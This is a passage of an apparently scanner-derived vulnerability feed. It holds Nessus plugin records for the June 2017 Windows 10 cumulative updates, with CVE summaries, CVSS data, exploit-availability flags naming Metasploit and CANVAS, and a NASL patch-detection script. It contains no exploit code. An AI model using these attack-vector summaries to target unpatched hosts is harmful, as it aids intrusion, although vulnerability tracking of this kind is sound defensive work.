(CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8520, CVE-2017-8521, CVE-2017-8549)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A security bypass vulnerability exists in Microsoft Edge\n in the Content Security Policy (CSP) due to improper\n validation of documents. An unauthenticated, remote\n attacker can exploit this, by convincing a user to\n follow a link, to cause the user to load a malicious\n website. (CVE-2017-8555)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. 
An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)", "edition": 42, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "KB4022725: Windows 10 Version 1703 June 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-8579", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8576", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2017-06-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022725.NASL", "href": "https://www.tenable.com/plugins/nessus/100763", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100763);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n 
\"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0295\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8498\",\n \"CVE-2017-8499\",\n \"CVE-2017-8504\",\n \"CVE-2017-8515\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8520\",\n \"CVE-2017-8521\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8554\",\n \"CVE-2017-8555\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98833,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98845,\n 98847,\n 98848,\n 98849,\n 98850,\n 98853,\n 98854,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98883,\n 98884,\n 98885,\n 98886,\n 98887,\n 98892,\n 98895,\n 98900,\n 98901,\n 98902,\n 98903,\n 98904,\n 98914,\n 98920,\n 98922,\n 98923,\n 98925,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98942,\n 98954,\n 98955,\n 98956,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022725\");\n script_xref(name:\"MSFT\", value:\"MS17-4022725\");\n\n 
script_name(english:\"KB4022725: Windows 10 Version 1703 June 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1703 host is missing security update\nKB4022725. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. 
(CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect\n permissions being set on folders inside the DEFAULT\n folder structure. An authenticated, remote attacker can\n exploit this, by logging in to the affected system\n before the user can log in, to modify the user's DEFAULT\n folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. 
An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run processes in\n an elevated context. (CVE-2017-8465)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. 
(CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8474, CVE-2017-8475,\n CVE-2017-8476, CVE-2017-8477, CVE-2017-8478,\n CVE-2017-8479, CVE-2017-8480, CVE-2017-8481,\n CVE-2017-8482, CVE-2017-8483, CVE-2017-8484,\n CVE-2017-8489, CVE-2017-8490, CVE-2017-8491,\n CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge due to improper handling of JavaScript\n XML DOM objects. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8499)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge in the Fetch API due to improper handling\n of filtered response types. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose sensitive\n information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. 
(CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8520, CVE-2017-8521, CVE-2017-8549)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A security bypass vulnerability exists in Microsoft Edge\n in the Content Security Policy (CSP) due to improper\n validation of documents. An unauthenticated, remote\n attacker can exploit this, by convincing a user to\n follow a link, to cause the user to load a malicious\n website. (CVE-2017-8555)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. 
An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022725/windows-10-update-kb4022725\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c538cc09\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022725 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : 
Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkbs = make_list(\n '4022725' # 10 1703 \n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4022725))\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:54", "description": "The remote Windows host is missing security update KB4022715. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. 
A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0173,\n CVE-2017-0215, CVE-2017-0216, CVE-2017-0218,\n CVE-2017-0219)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect\n permissions being set on folders inside the DEFAULT\n folder structure. An authenticated, remote attacker can\n exploit this, by logging in to the affected system\n before the user can log in, to modify the user's DEFAULT\n folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. 
(CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. 
An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8496, CVE-2017-8497)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge due to improper handling of JavaScript\n XML DOM objects. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge in the Fetch API due to improper handling\n of filtered response types. 
An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose sensitive\n information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or reboot. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. 
(CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. 
A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists in DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n", "edition": 45, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8496", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", 